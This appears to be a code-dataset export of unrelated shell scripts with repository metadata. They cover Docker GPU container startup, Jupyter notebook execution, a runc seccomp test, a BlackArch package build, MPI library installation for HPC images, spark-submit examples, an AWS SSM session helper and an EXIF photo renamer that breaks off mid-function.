                _optarg_check_for_opt "${opt}" "${shm_size}"
                ;;
            --network)
                network="$1"
                shift
                _optarg_check_for_opt "${opt}" "$network"
                ;;
            stop)
                # Stop AND remove (force) all of this user's containers.
                stop_all_containers_for_user "-f"
                exit 0
                ;;
            *)
                warning "Unknown option: ${opt}"
                exit 2
                ;;
        esac
    done # End while loop
    # Only override the SHM_SIZE default when --shm-size was given.
    [[ -n "${shm_size}" ]] && SHM_SIZE="${shm_size}"
}
# Probe the host for a usable NVIDIA GPU setup and, when found, switch
# DOCKER_RUN to a GPU-enabled invocation. Sets the global USE_GPU_HOST to
# 1 only when both the host driver and the container runtime support GPUs.
function determine_gpu_use_host() {
    if [ "${HOST_ARCH}" = "aarch64" ]; then
        # On Jetson-style aarch64 hosts the nvgpu kernel module indicates
        # an integrated NVIDIA GPU.
        if lsmod | grep -q "^nvgpu"; then
            USE_GPU_HOST=1
        fi
    else
        # Check nvidia-driver and GPU device
        local nv_driver="nvidia-smi"
        if [ ! -x "$(command -v ${nv_driver})" ]; then
            warning "No nvidia-driver found. CPU will be used"
        elif [ -z "$(eval ${nv_driver})" ]; then
            warning "No GPU device found. CPU will be used."
        else
            USE_GPU_HOST=1
        fi
    fi
    # Try to use GPU inside container
    local nv_docker_doc="https://github.com/NVIDIA/nvidia-docker/blob/master/README.md"
    if [ ${USE_GPU_HOST} -eq 1 ]; then
        DOCKER_VERSION=$(docker version --format '{{.Server.Version}}')
        if [[ -x "$(which nvidia-container-toolkit)" ]]; then
            # "docker run --gpus" requires Docker-CE 19.03 or newer.
            if dpkg --compare-versions "${DOCKER_VERSION}" "ge" "19.03"; then
                DOCKER_RUN="docker run --gpus all"
            else
                warning "You must upgrade to Docker-CE 19.03+ to access GPU from container!"
                USE_GPU_HOST=0
            fi
        elif [[ -x "$(which nvidia-docker)" ]]; then
            # Legacy nvidia-docker wrapper fallback.
            DOCKER_RUN="nvidia-docker run"
        else
            USE_GPU_HOST=0
            warning "Cannot access GPU from within container. Please install " \
                "latest Docker and NVIDIA Container Toolkit as described by: "
            warning " ${nv_docker_doc}"
        fi
    fi
}
# For non-root callers, create a matching user account inside the freshly
# started container by staging helper scripts into /tmp (shared with the
# container via the -v /tmp:/tmp mount in main) and running the setup as
# root inside the container.
function post_run_setup() {
    if [ "${USER}" != "root" ]; then
        cp $DIR/docker_start_user.sh /tmp
        cp $DIR/get_grpid.pl /tmp
        cp $DIR/centos_add_user.sh /tmp
        docker exec -u root "${container_name}" bash -c '/tmp/docker_start_user.sh'
        # Clean up the staged helpers from the shared /tmp.
        rm /tmp/docker_start_user.sh
        rm /tmp/get_grpid.pl
        rm /tmp/centos_add_user.sh
    fi
}
# Entry point: parse options, detect GPU support, then start a detached
# container named "<user>_<name>" with the caller's identity exported into
# the environment for post_run_setup.
function main() {
    parse_arguments "$@"
    info "Determine whether host GPU is available ..."
    determine_gpu_use_host
    info "USE_GPU_HOST: ${USE_GPU_HOST}"
    local local_host="$(hostname)"
    # Forward X11 DISPLAY into the container only when the host has one.
    if [ -z ${DISPLAY+x} ]; then
        display_opt=""
    else
        display_opt="-e DISPLAY=${DISPLAY:-:0}"
        info "docker's env DISPLAY=$display_opt"
    fi
    local user="${USER}"
    # Namespace the container by user so "stop" can find it later.
    if [[ ! $container_name =~ ^$user ]]; then
        container_name="${user}_$container_name"
    fi
    info "Starting docker container \"${container_name}\" ..."
    local uid="$(id -u)"
    local group="$(id -g -n)"
    local gid="$(id -g)"
    ${DOCKER_RUN} -itd \
        --name "${container_name}" ${display_opt} \
        -e DOCKER_USER="${user}" \
        -e USER="${user}" \
        -e DOCKER_USER_ID="${uid}" \
        -e DOCKER_GRP="${group}" \
        -e DOCKER_GRP_ID="${gid}" \
        -e DOCKER_IMG="${image_name}" \
        -e HOST_OS="${HOST_OS}" \
        -e USE_GPU_HOST="${USE_GPU_HOST}" \
        -e NVIDIA_VISIBLE_DEVICES=all \
        -e NVIDIA_DRIVER_CAPABILITIES=compute,video,graphics,utility \
        --net ${network} \
        -w /home/${user} \
        --add-host "${local_host}:127.0.0.1" \
        --hostname "${container_name}" \
        --shm-size "${SHM_SIZE}" \
        --pid=host \
        -v /dev/null:/dev/raw1394 \
        -v /tmp:/tmp \
        ${image_name}:${tag} \
        /bin/bash
    if [ $? -ne 0 ]; then
        error "Failed to start docker container \"${container_name}\" based on image: ${image_name}:${tag}" 0
        exit 1
    fi
    post_run_setup
    info "Congratulations! You have successfully started the container ($container_name) based on image: ($image_name:$tag)"
    info "To login into the newly created ${container_name} container, please run the following command:"
    info " vmc_dc_enter.sh -n $container_name"
    info "Enjoy!"
}
main "$@"
| true
|
19b06e5aeb676fd8cf422cfceb36f2a8577f1af6
|
Shell
|
d2l-ai/utils
|
/run_ipynb.sh
|
UTF-8
| 410
| 3.828125
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Execute every Jupyter notebook matching the given pattern, in place.
set -ex
if [ $# -ne 1 ]; then
    echo "Usage: bash $0 NOTEBOOKS"
    echo "E.g., bash run_notebooks.sh 'chap/*'"
    echo "Execute all the notebooks and save outputs (assuming with Python 3)."
    # Fix: "exit -1" is outside the 0-255 range and is reported as 255;
    # use a conventional non-zero status instead.
    exit 1
fi
NOTEBOOKS=$1
# Intentionally unquoted: the caller passes a quoted glob (e.g. 'chap/*')
# that must expand here.
for f in $NOTEBOOKS; do
    echo "==Executing $f"
    jupyter nbconvert --execute --ExecutePreprocessor.kernel_name=python3 --to notebook --ExecutePreprocessor.timeout=1200 --inplace "$f"
done
| true
|
347ecf3f07d1b45f49f0a8de1bc5ee252f310a82
|
Shell
|
dweomer/opencontainers-runc
|
/tests/integration/seccomp.bats
|
UTF-8
| 489
| 3.15625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bats
# Integration test for runc's seccomp -ENOSYS handling, written for the
# bats framework; setup_busybox/teardown_bundle/update_config come from the
# shared "helpers" library loaded below.

load helpers

# Fresh busybox bundle before each test case.
function setup() {
    setup_busybox
}

function teardown() {
    teardown_bundle
}

@test "runc run [seccomp -ENOSYS handling]" {
    TEST_NAME="seccomp_syscall_test1"
    # Compile the test binary and update the config to run it.
    gcc -static -o rootfs/seccomp_test "${TESTDATA}/${TEST_NAME}.c"
    update_config ".linux.seccomp = $(<"${TESTDATA}/${TEST_NAME}.json")"
    update_config '.process.args = ["/seccomp_test"]'
    runc run test_busybox
    # $status is set by the runc helper wrapper; 0 means the container ran.
    [ "$status" -eq 0 ]
}
| true
|
1be41ae4d2db1a25f0a69dab324e81110f8f9177
|
Shell
|
AlisamTechnology/blackarch
|
/packages/sigspotter/PKGBUILD
|
UTF-8
| 766
| 2.609375
| 3
|
[] |
no_license
|
# This file is part of BlackArch Linux ( http://blackarch.org ).
# See COPYING for license details.

pkgname='sigspotter'
pkgver='1.0'
pkgrel=1
pkgdesc='A tool that search in your HD to find wich publishers has been signed binaries in your PC.'
url='http://www.security-projects.com/?SigSpotter'
groups=('blackarch' 'blackarch-windows' 'blackarch-misc')
license=('custom:unknown')
arch=('any')
# unrar is only needed at build time to unpack the RAR source archive.
makedepends=('unrar')
# NOTE(review): googlecode.com downloads are long defunct; this source URL
# almost certainly no longer resolves -- verify a mirror before building.
source=('http://sbdtools.googlecode.com/files/SigSpotter.rar')
# Skip makepkg's automatic extraction; prepare() unpacks it manually.
noextract=('SigSpotter.rar')
sha1sums=('728b8cd12964a4e98c529c15ed516b866bf22c36')

# Extract the RAR archive into $srcdir.
prepare() {
    cd "$srcdir"
    unrar x SigSpotter
}

# Install the extracted payload under /usr/share/windows/sigspotter.
package() {
    cd "$srcdir"
    mkdir -p "$pkgdir/usr/share/windows/sigspotter"
    # Drop the archive first so the wildcard copy below only picks up the
    # extracted files, not the RAR itself.
    rm SigSpotter.rar
    cp -a * "$pkgdir/usr/share/windows/sigspotter"
}
| true
|
94b1c60873f5fa0d00fb2bbb89cab402811720bc
|
Shell
|
katka-juhasova/BP-data
|
/modules/dromozoa-ubench/lib/luarocks/rocks-5.3/dromozoa-ubench/1.5-1/bin/dromozoa-ubench
|
UTF-8
| 1,708
| 3.359375
| 3
|
[
"MIT"
] |
permissive
|
#! /bin/sh -e
# Copyright (C) 2015,2018 Tomoyuki Fujimori <moyu@dromozoa.com>
#
# This file is part of dromozoa-ubench.
#
# dromozoa-ubench is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# dromozoa-ubench is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with dromozoa-ubench. If not, see <http://www.gnu.org/licenses/>.
# Portable basename(1) replacement built on expr/sed (autoconf-style idiom);
# the "X" prefix guards against arguments that look like expr operators.
dromozoa_basename() {
expr "X$1" : 'X.*\(/[^/][^/]*\)/*$' \
'|' "X$1" : '\(X//\)$' \
'|' "X$1" : '\(X/\)' \
'|' "X$1" | sed 's/^.//'
}
# Portable dirname(1) replacement, same autoconf-style expr technique.
dromozoa_dirname() {
expr "X$1" : '\(X.*[^/]\)//*[^/][^/]*/*$' \
'|' "X$1" : '\(X//\)[^/]' \
'|' "X$1" : '\(X//\)$' \
'|' "X$1" : '\(X/\)' \
'|' X. | sed 's/^.//'
}
# First argument: the benchmarks file; remaining arguments: one or more lua
# interpreters to run the benchmarks with.
case X$1 in
X) exit 1;;
*) benchmarks_filename=$1; shift;;
esac
# Absolute directory of this script (the report tool lives next to it).
here=`dromozoa_dirname "$0"`
here=`(cd "$here" && pwd)`
# Derive the results directory from the benchmarks file name by stripping
# a leading "ubench_" prefix and the file extension.
dir=`dromozoa_basename "$benchmarks_filename"`
dir=`expr "X$dir" : 'Xubench\(_.*\)' '|' "X$dir" | sed -e 's/^.//'`
dir=`expr "X$dir" : '\(X.*\)\.' '|' "X$dir" | sed -e 's/^.//'`
mkdir -p "$dir"
rm -f "$dir/"results-*.dat
# Run the benchmark suite once per supplied lua interpreter, writing
# results-01.dat, results-02.dat, ...
i=0
for lua in "$@"
do
i=`expr "$i" + 1`
results_filename=`printf '%s/results-%02d.dat' "$dir" "$i"`
echo 'require "dromozoa.ubench" (0.001, 1000, ...)' | "$lua" - "$benchmarks_filename" "$results_filename"
done
# Aggregate all per-interpreter results into a report.
"$here/dromozoa-ubench-report" "$dir" "$dir"/results-*.dat
| true
|
f86e4a9ffe33a2c2e3f89796cdacf2246b5bf4c9
|
Shell
|
hyguo2/wPSN_classification
|
/scripts/towtgdv_all.sh
|
UTF-8
| 3,052
| 3.671875
| 4
|
[] |
no_license
|
#!/usr/bin/bash
# Fix: the shebang was buried below the header comment block, where the
# kernel ignores it; it must be the very first line of the file.
##############################################################################################
# Purpose: Network to wt gdv
# Author: Khalique Newaz
#
# The parameter [input-dir] is the directory containg the folder that has all the networks
#
# The parameter [annotation-file] is the file containg the list of proteins whose GDVs are calculated
#
# The parameter [algorithm] has four values: 1, 2, 3, and 4, that correspond to the following.
# 1: edge vs. edge orbits COUNTS
# 2: edge vs. edge orbits WEIGHTS
# 3: node vs. edge orbits COUNTS
# 4: node vs. edge orbits WEIGHTS
#
#
##############################################################################################
if [ "$#" -lt 4 ]; then
# Fix: quoted so "[input-dir]" etc. cannot glob-expand against
# single-character filenames in the working directory.
echo "Error: Wrong number of arguments"
echo "Usage: $0 [input-dir] [annotation-file] [algorithm] [output-dir] -m [atom: default 4]"
echo "Example: $0 [input-dir] [annotation-file] 2 [output-dir] -m 4"
exit
fi
totalArgument=$#
matDirectory=$1
shift
annotationfile=$1
shift
algorithm=$1
shift
outputDir=$1
#outputDir="${outputDir,,}"
shift
if [ ! -d "$matDirectory" ]; then
echo "Error: Directory $matDirectory not found"
exit
fi
# NOTE(review): $b is never used below -- confirm before removing.
b=$(basename "$annotationfile" | cut -d"." -f1)
## default values ###############################
cutoff=4
##################################################
# Parse the optional "-m <cutoff>" pairs following the 4 positional args.
for((i=5;i<=totalArgument;i+=2)); do
type=$1
shift
if [ $i -eq $totalArgument ]; then
echo "Error: Missing value for the parameter $type"
exit
fi
val=$1
shift
if [ "$type" == "-m" ]; then
cutoff=$val
else
echo "Error: Wrong type of parameter $type"
exit
fi
done
if [ ! -d "$outputDir" ]; then
mkdir "$outputDir"
fi
if [ ! -d "$outputDir/wt-GDVs-$cutoff-A" ]; then
mkdir "$outputDir/wt-GDVs-$cutoff-A"
fi
outt=$matDirectory/
# Split the annotation-file read below on newlines only (lines may contain
# tabs that must survive into cut).
IFS=$'\n'
###########################################################################
# computing wt edge gdvs
# for every id in the annotation file
count=0
for line in $(cat "$annotationfile");
do
filID=$(echo $line | cut -f2)
fileID=$(echo $filID | cut -d'.' -f 1)
#echo $fileID
goutt=$outputDir/wt-GDVs-$cutoff-A/$fileID
if [ ! -d "$goutt" ]; then
mkdir "$goutt"
fi
if [ "$algorithm" == 1 ];
then
./scripts/bin/ecount $outt/$fileID.gw $goutt/ew
elif [ "$algorithm" == 2 ];
then
./scripts/bin/ewcount $outt/$fileID.gw $goutt/ew
elif [ "$algorithm" == 3 ];
then
./scripts/bin/necount $outt/$fileID.gw $goutt/ew
elif [ "$algorithm" == 4 ];
then
./scripts/bin/nwcount $outt/$fileID.gw $goutt/ew
fi
count=$((count + 1))
echo "computing weighted GDVs... $count"
done
| true
|
970d52b1b693bc435792042a773c6f1c6df378d7
|
Shell
|
Azure/azhpc-images
|
/ubuntu/common/install_mpis.sh
|
UTF-8
| 5,342
| 2.953125
| 3
|
[
"MIT",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
#!/bin/bash
set -ex
# Install the MPI stacks used by the Azure HPC images — HPC-X, MVAPICH2,
# OpenMPI and Intel oneAPI MPI — and publish an environment-modules file
# for each under /usr/share/modules/modulefiles/mpi.
# Requires: $DISTRIBUTION, $COMMON_DIR, $UCX_PATH and $HCOLL_PATH to be set
# by the calling image-build scripts (not defined here).
# Parameters
HPCX_CHECKSUM=$1
# Load gcc
# NOTE(review): "set CC=..." replaces the positional parameters rather than
# setting a variable — presumably "export CC=/usr/bin/gcc" was intended
# (harmless here because $1 was already captured above); confirm.
set CC=/usr/bin/gcc
set GCC=/usr/bin/gcc
INSTALL_PREFIX=/opt
# HPC-X v2.16 — prebuilt tarball from Mellanox; verified against the
# checksum passed in as $1.
HPCX_VERSION="v2.16"
TARBALL="hpcx-${HPCX_VERSION}-gcc-mlnx_ofed-$DISTRIBUTION-cuda12-gdrcopy2-nccl2.18-x86_64.tbz"
HPCX_DOWNLOAD_URL=https://content.mellanox.com/hpc/hpc-x/${HPCX_VERSION}/${TARBALL}
HPCX_FOLDER=$(basename ${HPCX_DOWNLOAD_URL} .tbz)
$COMMON_DIR/download_and_verify.sh ${HPCX_DOWNLOAD_URL} ${HPCX_CHECKSUM}
tar -xvf ${TARBALL}
mv ${HPCX_FOLDER} ${INSTALL_PREFIX}
HPCX_PATH=${INSTALL_PREFIX}/${HPCX_FOLDER}
$COMMON_DIR/write_component_version.sh "HPCX" $HPCX_VERSION
# MVAPICH2 2.3.7-1 — built from source.
MV2_VERSION="2.3.7-1"
MV2_DOWNLOAD_URL=http://mvapich.cse.ohio-state.edu/download/mvapich/mv2/mvapich2-${MV2_VERSION}.tar.gz
$COMMON_DIR/download_and_verify.sh $MV2_DOWNLOAD_URL "fdd971cf36d6476d007b5d63d19414546ca8a2937b66886f24a1d9ca154634e4"
tar -xvf mvapich2-${MV2_VERSION}.tar.gz
cd mvapich2-${MV2_VERSION}
# Error exclusive to Ubuntu 22.04
# configure: error: The Fortran compiler gfortran will not compile files that call
# the same routine with arguments of different types.
./configure $(if [[ ${DISTRIBUTION} == "ubuntu22.04" ]]; then echo "FFLAGS=-fallow-argument-mismatch"; fi) --prefix=${INSTALL_PREFIX}/mvapich2-${MV2_VERSION} --enable-g=none --enable-fast=yes && make -j$(nproc) && make install
cd ..
$COMMON_DIR/write_component_version.sh "MVAPICH2" ${MV2_VERSION}
# OpenMPI 4.1.5 — built from source against the image's UCX and HCOLL.
OMPI_VERSION="4.1.5"
OMPI_DOWNLOAD_URL=https://download.open-mpi.org/release/open-mpi/v4.1/openmpi-${OMPI_VERSION}.tar.gz
$COMMON_DIR/download_and_verify.sh $OMPI_DOWNLOAD_URL "c018b127619d2a2a30c1931f316fc8a245926d0f5b4ebed4711f9695e7f70925"
tar -xvf openmpi-${OMPI_VERSION}.tar.gz
cd openmpi-${OMPI_VERSION}
./configure --prefix=${INSTALL_PREFIX}/openmpi-${OMPI_VERSION} --with-ucx=${UCX_PATH} --with-hcoll=${HCOLL_PATH} --enable-mpirun-prefix-by-default --with-platform=contrib/platform/mellanox/optimized && make -j$(nproc) && make install
cd ..
$COMMON_DIR/write_component_version.sh "OMPI" ${OMPI_VERSION}
# Intel MPI 2021 (Update 9) — silent offline installer; EULA auto-accepted.
IMPI_2021_VERSION="2021.9.0"
IMPI_2021_DOWNLOAD_URL=https://registrationcenter-download.intel.com/akdlm/IRC_NAS/718d6f8f-2546-4b36-b97b-bc58d5482ebf/l_mpi_oneapi_p_${IMPI_2021_VERSION}.43482_offline.sh
$COMMON_DIR/download_and_verify.sh $IMPI_2021_DOWNLOAD_URL "5c170cdf26901311408809ced28498b630a494428703685203ceef6e62735ef8"
bash l_mpi_oneapi_p_${IMPI_2021_VERSION}.43482_offline.sh -s -a -s --eula accept
# Rename Intel's generic "mpi" modulefile directory to "impi" so it does not
# collide with the other MPI module names.
mv ${INSTALL_PREFIX}/intel/oneapi/mpi/${IMPI_2021_VERSION}/modulefiles/mpi ${INSTALL_PREFIX}/intel/oneapi/mpi/${IMPI_2021_VERSION}/modulefiles/impi
$COMMON_DIR/write_component_version.sh "IMPI_2021" ${IMPI_2021_VERSION}
# Module Files — each declares "conflict mpi" so only one stack loads at a time.
MODULE_FILES_DIRECTORY=/usr/share/modules/modulefiles/mpi
mkdir -p ${MODULE_FILES_DIRECTORY}
# HPC-X
cat << EOF >> ${MODULE_FILES_DIRECTORY}/hpcx-${HPCX_VERSION}
#%Module 1.0
#
# HPCx ${HPCX_VERSION}
#
conflict mpi
module load ${HPCX_PATH}/modulefiles/hpcx
EOF
# MVAPICH2
cat << EOF >> ${MODULE_FILES_DIRECTORY}/mvapich2-${MV2_VERSION}
#%Module 1.0
#
# MVAPICH2 ${MV2_VERSION}
#
conflict mpi
prepend-path PATH /opt/mvapich2-${MV2_VERSION}/bin
prepend-path LD_LIBRARY_PATH /opt/mvapich2-${MV2_VERSION}/lib
prepend-path MANPATH /opt/mvapich2-${MV2_VERSION}/share/man
setenv MPI_BIN /opt/mvapich2-${MV2_VERSION}/bin
setenv MPI_INCLUDE /opt/mvapich2-${MV2_VERSION}/include
setenv MPI_LIB /opt/mvapich2-${MV2_VERSION}/lib
setenv MPI_MAN /opt/mvapich2-${MV2_VERSION}/share/man
setenv MPI_HOME /opt/mvapich2-${MV2_VERSION}
EOF
# OpenMPI
cat << EOF >> ${MODULE_FILES_DIRECTORY}/openmpi-${OMPI_VERSION}
#%Module 1.0
#
# OpenMPI ${OMPI_VERSION}
#
conflict mpi
prepend-path PATH /opt/openmpi-${OMPI_VERSION}/bin
prepend-path LD_LIBRARY_PATH /opt/openmpi-${OMPI_VERSION}/lib
prepend-path MANPATH /opt/openmpi-${OMPI_VERSION}/share/man
setenv MPI_BIN /opt/openmpi-${OMPI_VERSION}/bin
setenv MPI_INCLUDE /opt/openmpi-${OMPI_VERSION}/include
setenv MPI_LIB /opt/openmpi-${OMPI_VERSION}/lib
setenv MPI_MAN /opt/openmpi-${OMPI_VERSION}/share/man
setenv MPI_HOME /opt/openmpi-${OMPI_VERSION}
EOF
# Intel 2021
cat << EOF >> ${MODULE_FILES_DIRECTORY}/impi_${IMPI_2021_VERSION}
#%Module 1.0
#
# Intel MPI ${IMPI_2021_VERSION}
#
conflict mpi
module load /opt/intel/oneapi/mpi/${IMPI_2021_VERSION}/modulefiles/impi
setenv MPI_BIN /opt/intel/oneapi/mpi/${IMPI_2021_VERSION}/bin
setenv MPI_INCLUDE /opt/intel/oneapi/mpi/${IMPI_2021_VERSION}/include
setenv MPI_LIB /opt/intel/oneapi/mpi/${IMPI_2021_VERSION}/lib
setenv MPI_MAN /opt/intel/oneapi/mpi/${IMPI_2021_VERSION}/man
setenv MPI_HOME /opt/intel/oneapi/mpi/${IMPI_2021_VERSION}
EOF
# Softlinks — unversioned convenience names for each stack.
ln -s ${MODULE_FILES_DIRECTORY}/hpcx-${HPCX_VERSION} ${MODULE_FILES_DIRECTORY}/hpcx
ln -s ${MODULE_FILES_DIRECTORY}/mvapich2-${MV2_VERSION} ${MODULE_FILES_DIRECTORY}/mvapich2
ln -s ${MODULE_FILES_DIRECTORY}/openmpi-${OMPI_VERSION} ${MODULE_FILES_DIRECTORY}/openmpi
ln -s ${MODULE_FILES_DIRECTORY}/impi_${IMPI_2021_VERSION} ${MODULE_FILES_DIRECTORY}/impi-2021
| true
|
54b8e045c4d5aa756954017361eeb63a369eecee
|
Shell
|
RoyLeeChina/XgbWorkstation
|
/src/main/resources/cmd_example.sh
|
UTF-8
| 1,559
| 2.84375
| 3
|
[] |
no_license
|
# Reference examples for submitting Spark applications with spark-submit.
#./bin/spark-submit \
#  --class <main-class> \        # main entry-point class of the application
#  --master <master-url> \       # URL of the cluster master
#  --deploy-mode <deploy-mode> \ # deployment mode
#  --conf <key>=<value> \        # optional configuration
#  ...                           # other options
#  <application-jar> \           # path to the application jar
#  [application-arguments]       # arguments passed to the main class
# In a cluster environment, application-jar must be reachable from every node:
# either an HDFS path, or a local filesystem path that exists at the same
# location on every machine in the cluster.
# Submit the application in local mode.
spark-submit \
--class org.apache.spark.examples.SparkPi \
--master local[2] \
/usr/app/spark-2.4.0-bin-hadoop2.6/examples/jars/spark-examples_2.11-2.4.0.jar \
100 # argument passed to SparkPi
# Submit to a standalone cluster in client mode.
spark-submit \
--class org.apache.spark.examples.SparkPi \
--master spark://hadoop001:7077 \
--executor-memory 2G \
--total-executor-cores 10 \
/usr/app/spark-2.4.0-bin-hadoop2.6/examples/jars/spark-examples_2.11-2.4.0.jar \
100
# Submit to a standalone cluster in cluster mode.
# --supervise enables supervision: the driver is restarted automatically if
# it exits abnormally.
# FIX: the comment previously sat after "--supervise \", which broke the
# line continuation and split the command in two; it now lives above.
spark-submit \
--class org.apache.spark.examples.SparkPi \
--master spark://207.184.161.138:7077 \
--deploy-mode cluster \
--supervise \
--executor-memory 2G \
--total-executor-cores 10 \
/usr/app/spark-2.4.0-bin-hadoop2.6/examples/jars/spark-examples_2.11-2.4.0.jar \
100
| true
|
9b079807d46bbce04131af1849280fb69acbf653
|
Shell
|
ParkvilleGeek/MCRIBS
|
/bin/MCRIBParcStats
|
UTF-8
| 606
| 3.390625
| 3
|
[] |
no_license
|
#!/bin/bash
# Print the mris_anatomical_stats commands needed to generate per-hemisphere
# cortical parcellation statistics for a FreeSurfer subject.
# NOTE: the inner command is *echoed*, not executed — this script emits the
# command lines (e.g. for piping into a scheduler); left as-is deliberately.
#
# Arguments:
#   $1  subject id (directory under ./freesurfer)
#   $2  hemisphere: "lh", "rh", or "both"
#   $3+ one or more parcellation atlas names (annot/ctab basenames)
if [ -z "$1" ]
then
	# FIX: the usage line previously documented only <subject id>, but the
	# script also requires a hemisphere argument and at least one atlas.
	echo "Usage: $0 <subject id> <lh|rh|both> <atlas> [<atlas> ...]"
	exit
fi
SUBJID=$1
HEMIS=$2
shift
shift
ATLASES=$@
export SUBJECTS_DIR=`pwd`/freesurfer
cd $SUBJECTS_DIR/$SUBJID
# "both" expands to a newline-separated list so the for-loop visits lh and rh.
if [ "$HEMIS" == "both" ]
then
	HEMIS="lh
rh"
fi
mkdir -p stats
# we can't use the etiv option since we dont have the talairach.xfm file
for CURHEMI in $HEMIS
do
	for ATLAS in $ATLASES
	do
		cd $SUBJECTS_DIR/$SUBJID/surf
		echo mris_anatomical_stats -th3 -mgz -cortex ../label/$CURHEMI.cortex.label -f stats/$CURHEMI.$ATLAS.stats -b -a label/$CURHEMI.$ATLAS.annot -c label/$CURHEMI.$ATLAS.ctab $SUBJID $CURHEMI
	done
done
| true
|
cd99e1fe83060a3c3ba650f4df747c1b9baf5928
|
Shell
|
cmachadox/script-access-ssm
|
/acessos.sh
|
UTF-8
| 1,306
| 3.4375
| 3
|
[] |
no_license
|
#!/bin/bash
# Interactive helper: list the EC2 instances in a chosen region that are
# manageable through AWS Systems Manager (SSM), let the user pick one by
# number, and open an SSM session to it.
clear
echo 'Norte Virginia = us-east-1'
echo 'Oregon = us-west-2'
echo 'Frankfurt = eu-central-1'
read -p "Escolha a Região da Instancia ? " region
#read region
echo "Gerando lista de instancias gerenciaveis, aguarde... "
# Instances registered with SSM in the region (InstanceId lines only).
aws ssm describe-instance-information --region $region | grep InstanceId > instancias-ssm.txt
# Id/Name pairs of every EC2 instance in the region.
aws ec2 describe-instances --instance-ids --region $region --query "Reservations[*].Instances[*].{Instance:InstanceId,Name:Tags[?Key=='Name']|[0].Value}" --output=text > instancias-nomes.txt 2> /dev/null
rm -f instancias-gerenciaveis.txt
# Intersect the two lists: keep only instances that are SSM-manageable.
cat instancias-nomes.txt | while read instancia nome ; do grep $instancia instancias-ssm.txt > log_grep.txt 2>&1 && echo -e "${instancia} ${nome}" >> instancias-gerenciaveis.txt ; done
if [[ $(wc -l instancias-gerenciaveis.txt | cut -d\ -f1 2> /dev/null) -gt 0 ]]
then
# NOTE(review): $profile is never assigned in this script — looks like a
# leftover from a profile-aware variant; confirm before relying on it.
echo "Ids encontrados no profile $profile"
cat -n instancias-gerenciaveis.txt
read -p "Escolha o ID: " id
# Line $id of the list; the trailing sed is intentionally commented out.
selecionado=`sed "$id !d" instancias-gerenciaveis.txt | awk '{print $1}' # | sed 's/"//g;s/,//g'`
echo "O ID escolhido é: " $selecionado
aws ssm start-session --target $selecionado --region $region
else
echo Nenhuma instancia encontrada na regiao $region
fi
| true
|
197e0fd776bb9ab12019084872f8f9fd7275a969
|
Shell
|
jiho-dev/myutils
|
/pic_rename.sh
|
UTF-8
| 5,913
| 3.453125
| 3
|
[] |
no_license
|
#!/bin/bash
# How to use this tool:
# 1) Install Linux in VirtualBox and configure a shared folder.
# 2) Install exiftool on Linux: sudo apt-get install exiftool
# 3) Copy this script into the image folder under the shared folder.
: '
# 예)
# [jjh@devme ~/img]$ tree
# ├── pic_rename.sh
# ├── tmp
# │ ├── 20150508_201552.jpg
# │ ├── DSC_1427.JPG
# │ ├── DSC_1428.JPG
# │ ├── DSC_1429.JPG
# │ ├── DSC_1430.JPG
# │ └── DSC_1441.JPG
'
# Scratchpad of exiftool invocations kept for reference (all inert).
#rm *.jpg -f
#rm *.JPG -f
#cp ./org/* .
#rm -f new/*
#exiftool '-filename<CreateDate' -d %y%m%d_%H%M%S%%-c.%%le -r -ext cr2 -ext mrw /media/ingest/test
#exiftool '-filename<CreateDate' -d %Y%m%d_%H%M%S%%-c.%%le -ext jpg .
#exiftool -v '-filename<CreateDate' -d %Y%m%d_%H%M%S%%+c.%%le -ext jpg .
#exiftool -v -ext jpg "-filename<${datetimeoriginal}${SubSecCreateDate}0.%e" -d %Y%m%d_%H%M%S .
#exiftool 20150513_194948.jpg -EXIF:SubSecTime
#exiftool -ext jpg -t -n -s2 -EXIF:SubSecTime ./DSC_3034_2.JPG
#exiftool -t -n -s2 -EXIF:SubSecTime ./1441061910693.jpg
#exiftool "-DateTimeOriginal-=0:0:0 1:0:0"
#exiftool "-filemodifydate<${datetimeoriginal;s/(\d{4}):00:00/$1:01:01/}"
#exiftool -AllDates+=1:30 -if '$make eq "Canon"' dir
#exiftool -modifydate+=3 a.jpg b.jpg
#######################
# Extract the destination path from exiftool's verbose rename output
# (3rd line, 3rd whitespace-separated field, wrapped in single quotes)
# and sync that file's filesystem mtime with its EXIF DateTimeOriginal.
# Prints "no file: <path>" when the extracted path does not exist.
set_modify_time() {
  local rename_log=$1
  local raw_path
  raw_path=$(printf '%s\n' "$rename_log" | awk 'NR == 3 { print $3 }')
  local target=${raw_path//\'/}   # strip the surrounding quote marks
  if [ -e "$target" ]; then
    exiftool '-filemodifydate<DateTimeOriginal' -d %Y%m%d_%H%M%S "$target"
  else
    echo "no file: $target"
  fi
}
# Copy $1 into directory $2 under a new name derived from the photo's
# EXIF CreateDate:
#   YYYYMMDD_HHMM_<author>_<sec>_<usec>.<ext>
# examples: 20160903_0520_hyojin_36_0000.jpg
#           20160903_0819_jiho_22_0000.jpg
# Afterwards set_modify_time propagates the EXIF date onto the copy's mtime.
# Note: msg is intentionally not local — it mirrors the original's globals.
apply_new_name() {
  local src_file=$1 dest_dir=$2 owner=$3 seconds=$4 subsec=$5
  msg="$(exiftool '-filename<CreateDate' -d %Y%m%d_%H%M_${owner}_${seconds}_${subsec}%%+c.%%le -v -o ./$dest_dir $src_file)"
  echo "$msg"
  set_modify_time "$msg"
}
# Copy every image in directory $1 into "$1_new", renamed by EXIF capture
# time via apply_new_name. The directory name itself is passed as the
# "author" component, so files sort by capture time and, on ties, by
# photographer/directory name.
rename_pic() {
local cur_dir=$1
local new_dir="$1_new"
# Create the destination directory (empty it if it already exists).
if [ ! -d $new_dir ]; then
mkdir -p $new_dir
else
rm -f $new_dir/*
fi
local files=`cd $cur_dir; ls ./*.[jJ]* 2>/dev/null`
local fcnt=$(cd $cur_dir; ls ./*.[Jj]* 2>/dev/null | wc -l)
local i
local cnt=1
for i in $files
do
local f=$(basename $i)
local ofile="$cur_dir/$f"
local usec
local sec
# Seconds component and sub-second counter from the image's EXIF data;
